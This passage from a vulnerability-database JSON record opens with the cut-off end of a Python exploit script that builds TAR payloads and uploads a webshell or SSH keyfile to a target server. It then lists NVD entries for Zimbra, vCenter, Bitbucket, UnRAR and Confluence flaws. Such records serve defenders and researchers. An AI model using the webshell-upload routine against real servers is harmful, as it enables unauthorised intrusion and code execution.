file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? 
[y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-03T14:53:53", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T15:15:00", "type": "cve", "title": "CVE-2022-37042", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-10-28T13:38:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-37042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:02", "description": "Corruption of the system by a remote, unauthenticated user. The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T19:15:00", "type": "cve", "title": "CVE-2022-27511", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T21:57:00", "cpe": [], "id": "CVE-2022-27511", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27511", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:54:31", "description": "Zimbra's sudo configuration permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T20:15:00", "type": "cve", "title": "CVE-2022-37393", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-18T17:12:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.7", "cpe:/a:zimbra:collaboration:8.7.7", "cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:8.8.11", "cpe:/a:zimbra:collaboration:8.7.11", "cpe:/a:zimbra:collaboration:8.7.10", "cpe:/a:zimbra:collaboration:8.8.4", "cpe:/a:zimbra:collaboration:8.8.3", "cpe:/a:zimbra:collaboration:8.8.8", "cpe:/a:zimbra:collaboration:9.0.0", 
"cpe:/a:zimbra:collaboration:8.8.9", "cpe:/a:zimbra:collaboration:8.8.2", "cpe:/a:zimbra:collaboration:8.8.12", "cpe:/a:zimbra:collaboration:8.7.9", "cpe:/a:zimbra:collaboration:8.8.0", "cpe:/a:zimbra:collaboration:8.7.6", "cpe:/a:zimbra:collaboration:8.8.6", "cpe:/a:zimbra:collaboration:8.8.10"], "id": "CVE-2022-37393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37393", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.7.11:p13:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p11:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p12:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p31:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p30:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p19:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p2:*:*:*:*:*:*", 
"cpe:2.3:a:zimbra:collaboration:8.8.9:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p33:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p14:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p27:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p6:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p9:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p25:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p15:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p23:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p34:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p32:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p0:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7.1:*:*:*:*:*:*", 
"cpe:2.3:a:zimbra:collaboration:8.7.11:p11:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:35:19", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T02:15:00", "type": "cve", "title": "CVE-2022-29499", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-05-05T18:25:00", "cpe": ["cpe:/a:mitel:mivoice_connect:22.20.2300.0"], "id": "CVE-2022-29499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mitel:mivoice_connect:22.20.2300.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:52", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. 
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T18:15:00", "type": "cve", "title": "CVE-2022-26138", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T14:13:00", "cpe": ["cpe:/a:atlassian:questions_for_confluence:2.7.35", "cpe:/a:atlassian:questions_for_confluence:2.7.34", "cpe:/a:atlassian:questions_for_confluence:3.0.2"], "id": "CVE-2022-26138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:2.7.35:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra 
Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27924", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-05-03T12:59:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27924", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:37:15", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. 
NOTE: WinRAR and Android RAR are unaffected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-09T08:15:00", "type": "cve", "title": "CVE-2022-30333", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T02:35:00", "cpe": [], "id": "CVE-2022-30333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:53:22", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. 
This vulnerability was reported via our Bug Bounty Program by TheGrandPew.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T06:15:00", "type": "cve", "title": "CVE-2022-36804", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-24T19:15:00", "cpe": ["cpe:/a:atlassian:bitbucket:8.3.0"], "id": "CVE-2022-36804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bitbucket:8.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:53", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. 
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T12:15:00", "type": "cve", "title": "CVE-2021-22005", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-30T22:36:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-22005", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. 
An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27925", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-28T19:11:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27925", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:47", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. 
This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21972", "cwe": ["CWE-306", "CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-21972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", 